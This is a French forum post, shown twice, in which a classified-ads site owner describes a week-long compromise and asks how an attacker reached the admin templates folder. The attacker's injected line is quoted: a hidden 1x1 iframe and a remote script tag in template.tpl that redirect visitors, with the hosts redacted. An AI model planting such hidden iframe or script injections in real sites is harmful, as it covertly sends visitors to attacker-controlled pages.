Bonjour
Voilà j’ai mon site de petites annonces qui est piraté depuis une semaine (je n’ais pas fait de mise à jour du script et maintenant je ne peux plus en faire car certaines parties du site on changées, je dis cela pour les personnes qui utilisent ce script). Bref, le hacker arrive jusque .../admin/config/templates_news/ et il met sur template.tpl cette ligne (<div id="stats" style="visibility:hidden;" width='1' height='1'><iframe src ="http://www......com" frameborder='0' height='1' width='1'></iframe></div> <script type="text/javascript" src="http://...."></script>) qui a pour but de faire une redirection sur un autre site.
Donc j’aurais quelques questions :
- est ce normal que l’on puisse arrivé à .../admin/config/templates_news/ aussi facilement, si non comment faire pour remédier à cela
- Comment le gars à pus insérer cette ligne dans template.tpl, j’ais lu dans certain site que c’est une injection SQL ? Si c’est une injection, par où est il obligé de passé (login, enregistrement…ou une autre entrée)
Merci
Voilà j’ai mon site de petites annonces qui est piraté depuis une semaine (je n’ais pas fait de mise à jour du script et maintenant je ne peux plus en faire car certaines parties du site on changées, je dis cela pour les personnes qui utilisent ce script). Bref, le hacker arrive jusque .../admin/config/templates_news/ et il met sur template.tpl cette ligne (<div id="stats" style="visibility:hidden;" width='1' height='1'><iframe src ="http://www......com" frameborder='0' height='1' width='1'></iframe></div> <script type="text/javascript" src="http://...."></script>) qui a pour but de faire une redirection sur un autre site.
Donc j’aurais quelques questions :
- est ce normal que l’on puisse arrivé à .../admin/config/templates_news/ aussi facilement, si non comment faire pour remédier à cela
- Comment le gars à pus insérer cette ligne dans template.tpl, j’ais lu dans certain site que c’est une injection SQL ? Si c’est une injection, par où est il obligé de passé (login, enregistrement…ou une autre entrée)
Merci